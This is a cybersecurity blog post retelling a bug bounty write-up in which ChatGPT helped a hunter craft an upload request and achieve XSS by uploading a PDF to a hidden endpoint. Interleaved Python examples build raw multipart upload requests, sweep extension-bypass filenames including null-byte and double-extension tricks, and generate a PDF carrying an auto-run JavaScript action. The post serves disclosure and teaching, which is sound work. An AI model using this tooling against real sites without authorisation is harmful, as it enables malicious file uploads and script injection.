
This Hacker Used ChatGPT to Find a Vulnerability

Indonesia – SECRY – Using ChatGPT to Find a Vulnerability: A Medium article by a bug hunter gives an insightful account of how ChatGPT contributed to discovering a bug in a private program. The write-up covers the hunter's approach, his toolset, the obstacles he ran into, and the breakthrough that earned him a bounty.

 

How the Hunter Started the Hunt

The bug hunter began with confidentiality in mind, since the target belonged to a private program; he refers to it only as redacted.com. The target was examined thoroughly.

Initial steps included understanding the target's functions, parameters and pages, and inspecting its JavaScript for sensitive data such as endpoints the interface never links to. Two crawling tools were used: Gospider (packaged on Kali Linux, installable with "apt install gospider") and Katana from ProjectDiscovery.

 

Finding a Hidden API Path

Crawling with these tools turned up several hidden paths, including `/api/REDACTED/upload.php`.

This caught his interest, and he searched the application for a file-upload feature tied to that API path. The feature was not exposed anywhere in the application's interface, yet the endpoint still accepted requests. That is the important oversight: an endpoint that is merely unlinked is still reachable, and hiding it from the UI is not access control.
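The discovery step above, as an added example that is not code from the original write-up: it takes mixed Gospider/Katana output (the sample lines below are constructed for this example; the real crawl of redacted.com is not public), extracts the in-scope paths, flags ones that look like server-side handlers, and separates paths that only surfaced from JavaScript analysis from those the pages actually link to. The interpretation of Gospider's `[linkfinder]` tag as "found inside a JavaScript file" and the keyword list are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample crawler output for this example (not from the original write-up).
# gospider prints lines like "[source] - URL"; katana prints bare URLs. Typical runs:
#   gospider -s https://redacted.com -d 2 --js -o gospider-out
#   katana -u https://redacted.com -jc -o katana.txt
CRAWL_OUTPUT = """\
[url] - https://redacted.com/
[href] - https://redacted.com/login
[javascript] - https://redacted.com/assets/app.min.js
[linkfinder] - https://redacted.com/api/REDACTED/upload.php
[linkfinder] - https://redacted.com/api/REDACTED/profile.php?id=1
[href] - https://redacted.com/api/REDACTED/profile.php?id=2
https://redacted.com/assets/app.min.js
https://redacted.com/api/REDACTED/upload.php
https://cdn.example.net/lib.js
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
GOSPIDER_RE = re.compile(r"^\[(\w+)\] - (https?://\S+)", re.M)

# Keywords that usually mark functionality worth a manual look (assumption; tune per target).
INTERESTING = ("upload", "import", "admin", "debug", "internal", "backup")


def extract_paths(output, scope_host):
    """Unique in-scope paths from mixed gospider/katana output, query strings dropped."""
    paths = set()
    for url in URL_RE.findall(output):
        parsed = urlparse(url)
        if parsed.netloc != scope_host:  # stay inside the program's scope
            continue
        paths.add(parsed.path)
    return sorted(paths)


def api_candidates(paths):
    """(path, flagged) for paths that look like server-side endpoints; flagged is True
    when the name suggests sensitive functionality such as an upload handler."""
    out = []
    for p in paths:
        if p.startswith("/api/") or p.endswith((".php", ".asp", ".aspx", ".jsp")):
            out.append((p, any(k in p.lower() for k in INTERESTING)))
    return out


def hidden_paths(output, scope_host):
    """Paths that only surfaced from JavaScript analysis ([linkfinder] lines, assumed to be
    URLs pulled out of JS files) and never from a page link: the endpoints the UI does not
    expose. Those are the first candidates for 'reachable but not meant to be used'."""
    from_js, from_links = set(), set()
    for source, url in GOSPIDER_RE.findall(output):
        parsed = urlparse(url)
        if parsed.netloc != scope_host:
            continue
        (from_js if source == "linkfinder" else from_links).add(parsed.path)
    return sorted(from_js - from_links)


if __name__ == "__main__":
    paths = extract_paths(CRAWL_OUTPUT, "redacted.com")
    for path, flagged in api_candidates(paths):
        print(("!! " if flagged else "   ") + path)
    print("unlinked:", hidden_paths(CRAWL_OUTPUT, "redacted.com"))
```

Feed it the concatenated output of both crawlers; the `hidden_paths` list is what the page calls hidden paths, and each entry deserves a manual request to see whether it responds without the UI ever having offered it.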

 

Using ChatGPT to Help

Having recognised the endpoint's potential, the bug hunter set out to exercise it by crafting an upload request by hand. Not being experienced at writing such requests, he turned to ChatGPT for help.

ChatGPT's guidance produced a prototype Burp request for a file upload, which he adjusted slightly to match the target's details.

 

Exploring the Impact

The upload succeeded, but the uploaded files did not execute payloads as expected. Trying different file extensions by hand did not produce the desired impact, so he used Burp Intruder to sweep the candidate file types systematically and found that only PDF files were accepted.
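The two steps above (hand-building the multipart upload request, then sweeping extensions Intruder-style to learn what the endpoint accepts), as one added example that is not code from the original write-up. The host, path, field name and cookie are placeholders, and `mock_upload_handler` is a constructed stand-in for `/api/REDACTED/upload.php` whose rules (extension whitelist plus a magic-byte check) are an assumption, not the real handler's behaviour; it exists so the sweep runs offline.

```python
import uuid


def build_multipart(field, filename, content_type, data, boundary=None):
    """multipart/form-data body (RFC 7578) carrying one file part.
    Returns (body_bytes, value for the Content-Type request header)."""
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return head + data + tail, f"multipart/form-data; boundary={boundary}"


def build_raw_request(host, path, field, filename, content_type, data,
                      boundary=None, cookie=None):
    """Raw HTTP/1.1 request bytes in the form one pastes into Burp Repeater/Intruder.
    Content-Length is computed from the real body so the server does not stall."""
    body, ctype = build_multipart(field, filename, content_type, data, boundary)
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"Content-Type: {ctype}",
        f"Content-Length: {len(body)}",
    ]
    if cookie:  # session cookie placeholder; the real one comes from the browser
        headers.append(f"Cookie: {cookie}")
    return "\r\n".join(headers).encode() + b"\r\n\r\n" + body


def mock_upload_handler(filename, content_type, data):
    """Constructed stand-in for the target's upload.php (assumption, not the real code):
    accepts only a .pdf extension and only bodies that start with the PDF magic."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext != "pdf":
        return 400, "extension not allowed"
    if not data.startswith(b"%PDF-"):
        return 400, "invalid pdf"
    return 200, f"/uploads/{filename}"


# Candidates an Intruder payload list would typically hold: server-side extensions,
# browser-rendered types, case and double-extension variants, a null-byte trick.
DEFAULT_EXTS = ["php", "php5", "phtml", "html", "svg", "pdf",
                "pdf.php", "php.pdf", "PDF", "pdf%00.php"]


def fuzz_extensions(handler, base="probe", exts=None, body=b"%PDF-1.4\n%probe\n"):
    """Intruder-style sweep: send the same body under each candidate filename and
    record the status per name. `handler` is any callable with the mock's signature;
    in a live test it would wrap an HTTP client sending build_raw_request()'s output."""
    results = {}
    for ext in exts or DEFAULT_EXTS:
        name = f"{base}.{ext}"
        status, _ = handler(name, "application/pdf", body)
        results[name] = status
    return results


def accepted(results):
    """Filenames the endpoint took; anything here that is not a plain .pdf is a lead."""
    return [name for name, status in results.items() if status == 200]


if __name__ == "__main__":
    print(build_raw_request("redacted.com", "/api/REDACTED/upload.php", "file",
                            "probe.pdf", "application/pdf", b"%PDF-1.4\n",
                            cookie="session=PLACEHOLDER").decode())
    print(accepted(fuzz_extensions(mock_upload_handler)))
```

Note what the sweep reports even against this toy whitelist: `probe.php.pdf` and `probe.PDF` pass alongside `probe.pdf`, so the next question for a tester is how the web server maps those names to handlers, which is exactly the kind of lead a systematic sweep surfaces and ad-hoc guessing misses.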

Although he nearly gave up, the bug hunter resumed his research, working with ChatGPT on whether XSS could be achieved through a PDF upload. ChatGPT pointed him to two references:

  • https://portswigger.net/research/portable-data-exfiltration and
  • https://huntr.dev/bounties/f66d33df-6588-4ab4-80a0-847451517944/

These references describe how JavaScript can be embedded in a PDF so that it runs when a JavaScript-capable viewer opens the file.
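The technique those references describe, as an added example that is not the hunter's PDF nor code from the linked research: a minimal, well-formed PDF whose document `/OpenAction` is a `/JavaScript` action, written with a correct cross-reference table so strict viewers do not reject it before reaching the action. The default payload `app.alert(1)` is the usual proof-of-concept; whether and how the script executes depends on the viewer (desktop readers, browser viewers and sandboxed renderers differ), so the write-up's own payload and viewer are the reference for what actually fired. `verify_xref` is a self-check that the offsets in the table really point at the objects.

```python
import re


def pdf_string(s):
    """Escape a Python string as a PDF literal string body: backslash and parentheses."""
    return s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")


def build_js_pdf(js="app.alert(1)"):
    """Bytes of a one-page PDF that asks the viewer to run `js` on open.
    Objects: 1 catalog (with /OpenAction), 2 pages tree, 3 blank page, 4 JS action."""
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
        b"<< /Type /Action /S /JavaScript /JS (" + pdf_string(js).encode() + b") >>",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))           # byte offset recorded in the xref table
        out += f"{num} 0 obj\n".encode() + body + b"\nendobj\n"
    xref_pos = len(out)
    out += f"xref\n0 {len(objects) + 1}\n".encode()
    out += b"0000000000 65535 f \n"        # entry 0: head of the free list, exactly 20 bytes
    for off in offsets:
        out += f"{off:010d} 00000 n \n".encode()   # 10-digit offset, gen 0, in-use, 20 bytes
    out += (f"trailer\n<< /Size {len(objects) + 1} /Root 1 0 R >>\n"
            f"startxref\n{xref_pos}\n%%EOF\n").encode()
    return bytes(out)


def verify_xref(pdf):
    """Re-read the xref table and confirm every in-use entry points at 'N 0 obj'."""
    m = re.search(rb"startxref\n(\d+)\n%%EOF", pdf)
    if not m:
        return False
    xref_pos = int(m.group(1))
    header = re.match(rb"xref\n0 (\d+)\n", pdf[xref_pos:])
    if not header:
        return False
    count = int(header.group(1))
    entries_start = xref_pos + header.end()
    for n in range(1, count):
        entry = pdf[entries_start + 20 * n: entries_start + 20 * (n + 1)]
        if len(entry) != 20 or entry[17:18] != b"n":
            return False
        if not pdf[int(entry[:10]):].startswith(f"{n} 0 obj\n".encode()):
            return False
    return True


if __name__ == "__main__":
    data = build_js_pdf()
    assert verify_xref(data)
    with open("openaction.pdf", "wb") as fh:   # upload this file through the endpoint
        fh.write(data)
```

The file this writes starts with the `%PDF-` magic and has a valid table, so it passes the kind of check the mock handler earlier in the page enforces; from there the test is simply to open the served file and see whether the viewer honours the action.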

 

The Bug Hunter Succeeded: XSS via PDF Upload

His persistence paid off: he embedded an XSS payload in a crafted PDF, uploaded it, and when the file was opened at its served path an alert appeared, confirming that the JavaScript executed.

 

Reporting the Bug and Getting USD 200

Finally, he promptly reported the bug to the company. Because the uploaded file was served from a different domain than the application, the script ran in that domain's origin rather than the target's, which limited the direct impact: it could not reach the application's cookies, pages or session. The main concern in the report was that the application accepted arbitrary file uploads through an endpoint its interface never exposed. His efforts were rewarded with a $200 bounty. For anyone triaging a similar finding, two checks decide how serious it is: which origin the stored file is served from, and whether it comes back with a Content-Disposition: attachment header (a download) or is rendered inline by the viewer.

 

The Takeaway

This story shows a bug hunter and an AI assistant working together, and it underlines the value of continued research and experimentation when a first attempt at impact fails. Readers get a fresh angle on cross-site scripting delivered through file uploads to add to their toolkit for future bug hunting and penetration testing.

 

Link to read full write up: https://abhishekgk.medium.com/how-chatgpt-helped-me-find-a-bug-b5a3795c722

 

Christin
https://secry.me/explore
A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world, with an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Created this website intentionally to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.
